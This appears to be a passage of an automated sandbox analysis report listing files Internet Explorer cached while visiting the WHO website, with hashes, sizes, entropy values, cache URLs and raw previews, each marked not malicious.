                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................M...."...............................................................................G...........................................................................................................................................................................................................$.@..."." D..H#................#.........................Xq...a..H.L...........................*BX....C.C....\.ux...(+...E.W.F..Q.h&.*... .p.....[GBF..........................r..z.|.]Z..+..=b.....Nz.y6>.s...../..u.|...>Nz.y9....G....Nz.y9....G....Nz.y9..O*.^.9..%..rqwd....h..0.R.^..s.C.].<V...p.w8.2..p.]...+.\.=2.............................E._7.z.......:R'.'.B..e.+.Nm...t.........................S.S.S.S.S.S.S.S.S.S.w.....scw<.(F...........................Q..Z/..=..~..!.u^]..v 1.%.Q.riU.'+.L8...D.1......2.@.......2.@.......2.eH
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sh.f48a1a04fe8dbf021b4cda1d[1].htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):72412
                                                                                                                                                                    Entropy (8bit):5.387358706587146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:8V69lS5FN9hXuSja0+S+4p94gHaF1NCo+mzITLE5zv:88lStbuy+4pag6jNCaIUl
                                                                                                                                                                    MD5:AACCA0023866ABEF872428C704F65AE9
                                                                                                                                                                    SHA1:8C653A4221EC9A027A6AFC42BC2D376D613D5BB4
                                                                                                                                                                    SHA-256:55D783462E6671FA985A6B0829DB15474F4E57F0555C93E15CC2DB6A1D1E6CAB
                                                                                                                                                                    SHA-512:F92BE33D2DB5B072358905F4E07320F69EAECCF54CE9F31579506ADD7C4D9FCA02340DADCFE6AA3D7D32BBBDFC8331C523C535DB9E06F5410044F1649151858C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <!DOCTYPE html><html><head><meta http-equiv=Content-type content="text/html; charset=utf-8"><meta name=robots content=noindex,nofollow><title>AddThis Utility Frame</title></head><body><script>/*!.AddThis - v8.28.6 - 20200604;.Copyright (c) 1998, 2020, Oracle and/or its affiliates..*/../*!....invariant : 2.1.0.BSD.Copyright (c).All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...* Neither the name of invariant nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior wr
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sh.f48a1a04fe8dbf021b4cda1d[2].htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):72412
                                                                                                                                                                    Entropy (8bit):5.387358706587146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:8V69lS5FN9hXuSja0+S+4p94gHaF1NCo+mzITLE5zv:88lStbuy+4pag6jNCaIUl
                                                                                                                                                                    MD5:AACCA0023866ABEF872428C704F65AE9
                                                                                                                                                                    SHA1:8C653A4221EC9A027A6AFC42BC2D376D613D5BB4
                                                                                                                                                                    SHA-256:55D783462E6671FA985A6B0829DB15474F4E57F0555C93E15CC2DB6A1D1E6CAB
                                                                                                                                                                    SHA-512:F92BE33D2DB5B072358905F4E07320F69EAECCF54CE9F31579506ADD7C4D9FCA02340DADCFE6AA3D7D32BBBDFC8331C523C535DB9E06F5410044F1649151858C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/sh.f48a1a04fe8dbf021b4cda1d.html
                                                                                                                                                                    Preview: <!DOCTYPE html><html><head><meta http-equiv=Content-type content="text/html; charset=utf-8"><meta name=robots content=noindex,nofollow><title>AddThis Utility Frame</title></head><body><script>/*!.AddThis - v8.28.6 - 20200604;.Copyright (c) 1998, 2020, Oracle and/or its affiliates..*/../*!....invariant : 2.1.0.BSD.Copyright (c).All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...* Neither the name of invariant nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior wr
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\yEIPefMsf70[1].htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49280
                                                                                                                                                                    Entropy (8bit):5.826156363631764
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:GKKslt1VI1g0IkFQhH4ZJH1NFC2rq4kW3s4XJVemgCGDwb2F+6gLF:yFkHeNFRWW3sOVntpN6M
                                                                                                                                                                    MD5:F5806B6B079504FBF0CB7ECCC860B095
                                                                                                                                                                    SHA1:C9ED87692CAFA46AAD5E51D0184C5713ECF85BE0
                                                                                                                                                                    SHA-256:4F0A000E580AD08E235F75D8CCF3A5F61D71CBA98B75DF4C768180D62C915757
                                                                                                                                                                    SHA-512:06EBEFC37AD50DB72D80CC7208757D71DD2C73D707531A70351A3BD644C89126B06988DD368AA26331E9CCC5F0862D267FE6575F5DF92726E8E3F1BD87CA8EF8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <!DOCTYPE html><html lang="en" dir="ltr" data-cast-api-enabled="true"><head><meta name="viewport" content="width=device-width, initial-scale=1"><style name="www-roboto" nonce="IHw7mGqzzDHOAi/xBnOaZg">@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff)format('woff');}</style><script name="www-roboto" nonce="IHw7mGqzzDHOAi/xBnOaZg">if (document.fonts && document.fonts.load) {document.fonts.load("400 10pt Roboto", "E"); document.fonts.load("500 10pt Roboto", "E");}</script><link rel="stylesheet" href="/s/player/9f1ab255/www-player.css" name="www-player" nonce="IHw7mGqzzDHOAi/xBnOaZg"><style nonce="IHw7mGqzzDHOAi/xBnOaZg">html {overflow: hidden;}body {font: 12px Roboto, Arial, sans-serif; background-color: #000; color: #fff; height: 100%; width: 100%; overflow: hidden; position: absolute; margin: 0; padding: 0;}#player {width: 100%; height: 100%;}h1 {text-align: center; color: #fff;}h3 {margin-top: 6px; margi
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\210323_BLS21079_WHO_WHD_EN_web-banner_A.1[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x164, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):10644
                                                                                                                                                                    Entropy (8bit):7.876397234646194
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:i3qNtnxXrCT/4MlLddBqiHsHXoJlO1ykqSzB0tshcgD/b2ZJ2zQR7dddddd9:i36ty1r/s+w1ykfLcgDKZJ4Y
                                                                                                                                                                    MD5:D65C603C0748D5D2272AF759413AF467
                                                                                                                                                                    SHA1:FEBD30A121C2672ECDC7DBCCE430C1DC1451285A
                                                                                                                                                                    SHA-256:1BBD86F9B4D2F1594EAB8EACA5B5E173D66C7C6502DA2F4D49410A515E79654F
                                                                                                                                                                    SHA-512:782B211BCE58D9DD74414AEAED433BD285EA721B7D59D8856BF561BDF6D615ED105BD3EAF345D8A184C6D68652C99ED1CDD3E527F6EE82B6D7E05DE788A2A705
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/world-health-day/210323_bls21079_who_whd_en_web-banner_a.1.tmb-479v.jpg?sfvrsn=f92ac7aa_2
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................".........................................................................................................z.z........O=p.....xJx\.y...||....k,z... ..........D&....[..ceW.z.a<./b.....'.0..,,.....e-.g...f.p.....=..._.W...7...9#.BO..B.~.."..Z.r:.[....9..[.Y....zy.|.z..........-<.....d....q.md..5=}....<3..L...../........~1'.z. .K.f.@.<...[.zF..smfI.sH_>.).vE...C.......(.0...;.x...........r.t...._o. .........m.....:p...n.........&.XU..{...Y.&..$.5!rx..yS8..V..+b_.....t.fI.sH]-...;".j.*.....V'..p...=8...M..Y.......>..i...3..u.....;p..C;{.#..6..uWP/.....p..:..>.?.N......Z..(../L..S..v...s{R..PW%}....&.V<.o...O..P.....FG....vWq...3.(..(....Z..s>:..........&.@g....8^q...b8q.....).....~c..7t..^.#...WC.hy.Y]..k45~`..........go.#C.$|..!.~Xt74...t.....'.0._a...a....GK.d......^+.[.R7.vC.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\210323_BLS21079_WHO_WHD_EN_web-banner_A.1[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x262, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):19508
                                                                                                                                                                    Entropy (8bit):7.842512517006768
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:RCvz/W/KyGtmTE3OE6JamYaB2RRTw1f3Af1G/N8SLv1yhnWgvMb3GmcKd7EtU:Rez/WR4+bJak2RR+3s18N8SLvCtYUtU
                                                                                                                                                                    MD5:8FB88ECF23E89D3F936708FACC49CACF
                                                                                                                                                                    SHA1:392D54B57FD15CB983C7095480CE9B09F8E13226
                                                                                                                                                                    SHA-256:F0299F8EE0A706F65F988EB36796F5823922E5570B2EEB1DD475B7052F96CDFB
                                                                                                                                                                    SHA-512:6880AC16D495602E7720A5CFC459377750EBB5426712B15E642D816EFC235C7689FE36D23A38B2F39319392482B889EF0EF4444A8595B43123E3B826359BB424
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/world-health-day/210323_bls21079_who_whd_en_web-banner_a.1.tmb-768v.jpg?sfvrsn=f92ac7aa_2
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"................................................................................0.>Y..X.`e...X.`e...X.`e...X.`e...X.`e...X.`e...X.`e...X.`e...X.`e...X.`e...X.`e...X..M..G. ...................................]..Fp..t.....c..Y0m..........{I.h{xO...R.:.)....t.^q..............i..*e.y........}..>....aA.. ...6.lgQ......+...%....Vr.{..s..`6j...w9......c.6v....G...Y..=)..w.S...E........\....V..@..........g...Vt..L.].|jG.,......s...e.V.uvg..,y....m...8..'}^WW..J1'c>oI.{..g.e..=...(J+z.....}.?W.4>y..u....8;;mv.....y....;.)...".@..I...?.F....O......g.........G.....i..-.....A:...r...h...*z...@.....3...w..uy.....g.:I`...z^){(.N]...g?B........?..UgtSv1.._..Vv..I..+;^g.;.N..s:|.........tb1....SY.u]>y.=a\...^..!.......>_Z.<..!....]......u.......UYl.v..u........g.........IA.0iU......i.LG9.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\3-wha71-dg-tedros-opening-speech[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 768x512, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):24576
                                                                                                                                                                    Entropy (8bit):7.9741020794538375
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:DD7PIESMHiNWhbTFxkg8fDlEqgD/M+VlCfV6sQRvZHzBAk93t/GePCSlUCHiUtdL:n7vA+PjYBTg7XcE1G0/cCHiUtjFBy2
                                                                                                                                                                    MD5:7009B04FECF6EE1F810344E2519C1632
                                                                                                                                                                    SHA1:3005449E27B0B4FA2B4EFC36AF1190BEDABDC1C9
                                                                                                                                                                    SHA-256:68957ABB2CEC5023531902126466B45BE0D51901A23D406B374A1F585C2F3652
                                                                                                                                                                    SHA-512:FB12DA8AC77A6694393628B9D8434C01ABA52C6373B9F0C5CA376209317CEEA80AE5AD3D88D215EC63447C429125D6974B0A594ED700C6C7D499E40C722FA00C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/world-health-assembly/wha71/day-1/3-wha71-dg-tedros-opening-speech.tmb-768v.jpg?Culture=en&sfvrsn=c6b9209c_12
                                                                                                                                                                    Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222..........."...............................................................R0D..).D..S(......6......!46....4....$.i$..D....J.L..N2uv6R.5g....@.SB.` zXv..c.HiJla)..6L.L.....i$u4tu.}.......b..ib.....J.65"..).R..$@L.L.jQ..kii.3nn..`..4.F.=.&.@.P.I&(...PL...R...;......Y.w..Hl.).x..!1....Ba)...6L....R..M.....Z..<ocowk(.tJ.<.yP6.... iJ..!..%0..J..C...F-]Ml&}...1......!.R.@.$....2.3(..ukuH......1..j.y..6r4..Mm..n...2..H..P6.....Q.G..:i".1.....ksb..5..JrP lJRC.@..bR.&Rm)5M.S..$:bS85u5.........S......lP.R..(.S2..2.bda)kN.,......d.2p....2.....<.|9.:....VI ...L$...)..)Z. ......i$...[KO]`0....<.p`........@.e!.)d...K_..H.m...jR..Jqk...<.Occ...s...3._[.f..5(.&R...L..K[..!..n.Lm...52..x-.N..{.7....j...8.6.P...$.L....7..@..D4.D.c..T...........u..r...I!..F).).H.L..+....H..&.....*q..../s.....tv<..y$..2.S*A....A.V-}..zD.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\3-wha71-dg-tedros-opening-speech[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 1024x682, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):38650
                                                                                                                                                                    Entropy (8bit):7.980841730185706
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:ZBqqtI9kvs37DamyXYcLntH+IH5zy2ndhswWsfp/xl5/iaDh:6qOuiPaAcTtH+IH5zy6hKsfp/Fio
                                                                                                                                                                    MD5:2B728A5A5B15E1F773A80CB11F6BC65B
                                                                                                                                                                    SHA1:EC51DF06AFBDC1891AB21D3D9AD1C1FAC3F254D4
                                                                                                                                                                    SHA-256:9C68D8F3B91F3B15314E2268CE39E54E42DB134D39131B1DB0BC7AC74B296155
                                                                                                                                                                    SHA-512:A38B732028C41353601AF9F099111263EF4A89F13A7610BD6AD40A04A3375572CD5BCA2BF40654210D74E951B6B33095F7518692CFCFFCBF45B24B696C6040F4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/world-health-assembly/wha71/day-1/3-wha71-dg-tedros-opening-speech.tmb-1024v.jpg?Culture=en&sfvrsn=c6b9209c_12
                                                                                                                                                                    Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222..........."..................................................4...........mg...$.1"@.)B..RC.....(HiJO.,.-.tv.... h` .16.....9...BI.%...HBR.&.%$.*T...*.6..;gswo5.@..... l@<:q...cB...P0)$."T.L.)HI)...(.6..9..;{.Y...Cm..`...Z.....a-!.$...I %BH.9I.%..4)F.....t..5..vv.6..@..`.4.@..-...6.!.I).c.BbS2...H$D........iHz............lLI.....xu.......b..`$ .2....@......^.ZI...._WW.5.>...Z`..`.JA.P..B...."T.0bI&.2..4.@..R4.Q.Z.ZI....z.z...]........P....v..c...R..0R.b.(..).&T..R1.d....m...SOS...;[[.lI.m.$...!.H....$.B.0I$...4J...JF=j....(.bX.j.k.&....V.l..-)..I.)!4.JR..!$.$...JB..H.I..[......BJp...a..cgkc#.!1.........IH..I... c...R. `.#R.iH.B..t....SS_.w....%.!.-8..:m!.`........ ..R.fR.c...{.......$!.......VM.....u.N2....B..I$.0I.i)..`.@J.I..Q:...C....B...S.....j.f...t.O.m......wHLlI!$. 4..C....L$..Ij.v...t1.B..i!...........j..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DSC_8725_s[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x313, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):30118
                                                                                                                                                                    Entropy (8bit):7.977459180715009
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:oNSTFCr/0pGhsgirF3oEjS3PUHhaZS+bpVXl+SKlGKCa2q:oYTFCr8pG2lLjxz+bpFIdoKz2q
                                                                                                                                                                    MD5:3D9BD82AFBAE8AFFACB6C57828A5975F
                                                                                                                                                                    SHA1:24A1BB72D1D165BAF9717887538699A2F351AC02
                                                                                                                                                                    SHA-256:6474EA00C22E130A9AE0A86511908BBF68C30D7A3FD77EE30B26E176F84034E9
                                                                                                                                                                    SHA-512:AD8C34AA332897F792FBEE598BE897412DD5461F218564D3FC9EBBA9C6D0D3EF28D5B56BA01B81AB7613D6FD10A81D40A034182089D950235EA6CFEBA71A4E6E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/dsc_8725_s.tmb-479v.jpg?Culture=en&sfvrsn=f688b931_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................9...."..............................................................................m....WC.S.x$1.8(@.*RfOZ$R...7.X......>7.x..O........@.<........E.q.O...j...*d.R.......X.z...x.....g'.....x%.M..0.[..t."...t3.A.{..t..x...~.=gE......4...E!..0=\...@.u.x-.../.\.kV..lZ..k..B..T.K....&...]."..(..,.[I.G7...B.|S.bL.b-..e........m%=.X.4..gi....@.i|..XH. .z{t.Qi...mKZ.........7..i.9..N-.k<..?MX.t\..Xt.t....*..T..c....#.3. .......].b\..p+....m.xV../..E.hO{."..7.....1..<QZ.J....G9.V.,nO=.,....A.....'G/.....ej..)[.3..Y.....V...sV.'te..j..y[......<Q....Qi..xP.D..`...n..x.:h...i...r;G.......N.G....|U..>J...>_.>|.,..IP>/.E..;....L.[2...'6%W.i.0r...`....6.F.|.l...;W..HR6...........no..~S..CY.=n.,..f....Eb.E|O..G.s.u..v..QK.....~x..._...M....||3o.nMgu^.lM_\....5.##.3/..?BB.y..*\.}/*..j.J.......?:.m..M.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DSC_8725_s[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x503, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):65607
                                                                                                                                                                    Entropy (8bit):7.982204543924515
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:gC4meKg/y9h2M11WjH28eQoHeRUkTKxXc8LfvuRiNZXAUh:e0gG116IQGe5mxM8LnhZT
                                                                                                                                                                    MD5:19519B7C057368CEE4C933AFD3E0380B
                                                                                                                                                                    SHA1:6EE8A0A2D26198B0DF8150C22A666C8318EB68A4
                                                                                                                                                                    SHA-256:19ACD8662CB3131304744AC40F3F5BA9F34592695069D1F8FCB0E3CA6F7CCD53
                                                                                                                                                                    SHA-512:59E042F686CEA24ED978508E00CFFEFFEB11F0F333841E45FF8F006B391A96540D9D447CAF5422FBD344E933D32962880F814430A365EE6D893803609AAD5082
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/dsc_8725_s.tmb-768v.jpg?Culture=en&sfvrsn=f688b931_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"...............................................................................K5:q:@hk.J.J..j.,.....[.bW....Q.I..$.....b.NDAM....4A...J ..54.....4V .....h...).lD...1.."!'rJR!...I.%......2uQy.+_.Y.G2r.Sp..;....vrQ..M.....Z'..Q...`QT6..vq$.`.....7........!.....wr*H.M....I$T....$.M..".j..@....55.5*.K.#8.#LSy...'.Tu.\0..Q<.K...Z.......v........d].X.~c^.*..2ki.s...{..#..~.70.E.2.r...v...?-..\.N............rlu........?...q.;....$.Z.+gF..+)..e.4_:&."t0...53.\..u.iv....[.J.P.+..{..`.....wg.L..2.Qq.J.!*$."U..\...z.8.0I.Z6..R...,H2'X..;y:.Rj...".y!...iS:T.I.d.E&i$.L.'H.$.i.../..^....d.c..1F......".m..z9..V...$..&!....Zeh..,Q...3..9'g$..;HyE.O...\.p.n.D..`.9z.~].Z@.f..YUo.$9.VE.Z.4v-.5.j...2.......I.Z*..0WI....*..=].gG@..WaeX.r...[54,.*]J..]Z...4b,.E......+...X..h./.>.a...L.......x.wg.QD.97...h....P..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\FL794448.htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):125455
                                                                                                                                                                    Entropy (8bit):5.059756207234469
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:y2oVCDlLZDKDjMODzzCH9Jel/3x+wLXiDTBIjD82B71Waca43GC5Q4838NILk37Q:yCZVGPMH9JH0lNB74aC3rILk37NP6445
                                                                                                                                                                    MD5:7076E8DC6270E59AF82533C83892FEFA
                                                                                                                                                                    SHA1:9D9420F8187DA3249B50155F935348D0DE18D2A7
                                                                                                                                                                    SHA-256:8E4FB552D7E739D7559A4E35FEC8EC409FCA552BAB26E80CFCE9D4332F71E72C
                                                                                                                                                                    SHA-512:62F1E2DE7CC87C3C588E573949E75BE2E86729D8F2152414E775F8C0669BE01F67771307BBA2C284FF339A599A3DD6EFDE6CE40CE7AFA6463AF95F5144520DBF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/
                                                                                                                                                                    Preview: <!DOCTYPE html> <html lang="en"> <head> head to scrape:on --> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><title>...WHO | World Health Organization..</title> <link rel="shortcut icon" href="/favicon.ico"> <link rel="manifest" href="/manifest.json"> <link href="//use.fontawesome.com/releases/v5.0.10/css/all.css" rel="stylesheet" type="text/css" /> <link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/grid.min.css?v=12.1.7126.28741' ><link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/origin.min.css?v=12.1.7126.28741' > head to scrape:off --> <link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/main.min.css?v=12.1.7126.28741' > <link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/print.min.css?v=12.1.7126.28741' media='print'> .. <script>.. var lang = document.documentEleme
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RS34669_Covax_Sticker_CMYK_Covax_5_Sqaure_CovaxColours[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x320, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):23947
                                                                                                                                                                    Entropy (8bit):7.953180725335218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:SFiNN6U1oYJWWZCcSgS/zC/qOo+SuCq16x70KMO/edofI5q4KabUPt5/8:S8NoU1osCcXS/7Oo+Bdsx7VBMNbK8
                                                                                                                                                                    MD5:C7D73DEA47A04842067A9F049DF10E78
                                                                                                                                                                    SHA1:EF27DF98EF1D3D542BA8F74A5D5460E2E87815B8
                                                                                                                                                                    SHA-256:6E7194A987421E2B6BB3DD7321896F41568305F0F4A1E809AFAE317C0C28DBE2
                                                                                                                                                                    SHA-512:D4FAA659282A621966408D636B158001FB2143FCC386457E2FC2E7A59EDBBA1612FD8C08F0B90F7EBB0F5D9AE9A79B8243ACB1429BD740F24A2B76FFCABC57EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/sri-lanka/rs34669_covax_sticker_cmyk_covax_5_sqaure_covaxcolours.tmb-479v.jpg?Culture=en&sfvrsn=5b1bfc6f_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................@...."..............................................................................D...............................n.M@.m...h.a .#XL..i....6Mgc.b3...y.......s@......}|.....v.G....9.E.L~...}o\.o./L...W.9.x.W..V.5j_[...q6]_m.Z..?<..N.6...0.2.q.n.w.R=.....En..|...Fz9Bc.".E.C...W...n....t.^...;.g#.|.L....I.n*b........2....Xo.z.m.....~...r..J.......{.+.i.......~zt.........)...G.';s.r./...R.......k......:..z.<:`.f.&-.u..-@.. ....C..zka.(.I.%..T.[u..:..~y.a..&....XY.t.1..=......o`S...)._.zE{.hU....w.NY...U.M|.S^t....JGB..9B.2.U........(+".F..C..X......].....ck.M"..8.4&0..L..6.=........3^e.Q........E..b..#...z%...w8s..eS.......GI..L.|.z...di..f3[......u.....Uirb...5.........................e17.|h7.|h7.|h7.|h7.|h7.|h7.|h7.|h7.|h7.|h7.|h7.|h7.|h>........................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RS34669_Covax_Sticker_CMYK_Covax_5_Sqaure_CovaxColours[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x513, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):45344
                                                                                                                                                                    Entropy (8bit):7.943160464664274
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:u2jd1UwVmsFmdNFhpaVBF8hRc+G+wNrv3VomzGSwxVlGLijhBRV/YuI1VtgU1v:u2BB0c0b/ayhRPG+wNjlozZE+jhBR017
                                                                                                                                                                    MD5:B3829C462B4095FC9F892F9D437D7C63
                                                                                                                                                                    SHA1:A683D5C22EB4E26C01495C0CD3581DBE1B428298
                                                                                                                                                                    SHA-256:0B9BDD6CAFF4A255E4778066FB550E465D8B72516FAFA6A97672A1D4DC3BED61
                                                                                                                                                                    SHA-512:525F8E8CDDEFF22434C809E8810B8E7EAAA9B0E0C8A67B038625F16B12F120F7FC165F3CB7148006CF2CB5D4C585E3A913368206DC45F5802DB746014344823B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/sri-lanka/rs34669_covax_sticker_cmyk_covax_5_sqaure_covaxcolours.tmb-768v.jpg?Culture=en&sfvrsn=5b1bfc6f_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"..............................................................................D..............................................................................a...........................................l.q.N.t.o(O9c...U...b..)..9.....\Z.u.0...U.%...+u=g......#...#7..W.k..........&......M=I...9....,.7.....;%..-LI..G(.=.!..b...2.......3..P...g.]...=xux..:v.........)...(n.J&~..0L..r.".{.M.....~..4.........^.................Cx.g....zvc.....=n9...w.Um...P....y=|..xe.;....{.+J.I.aq;...i|...a[a..d.......w.e..R..2...N..r.Q?1.e....E.../........>.we4.X..0....w"...,.....w...z\..<.....t...Z6..~.....&.[5e.?..[W'f%..b...z..i..[r.....t.-b..w+..tz....m.g.}..x..O..7W.......wSO.^j...~.v.j.9TL.o....P....wt.?D8r...<S0.\A0...:k.&......Y..:5.-.1...........`....m.#..{.s.C.uo.[`....1k....y{k..WO .jO...<.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ScriptResource[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):88145
                                                                                                                                                                    Entropy (8bit):5.291106244832159
                                                                                                                                                                    Encrypted:false
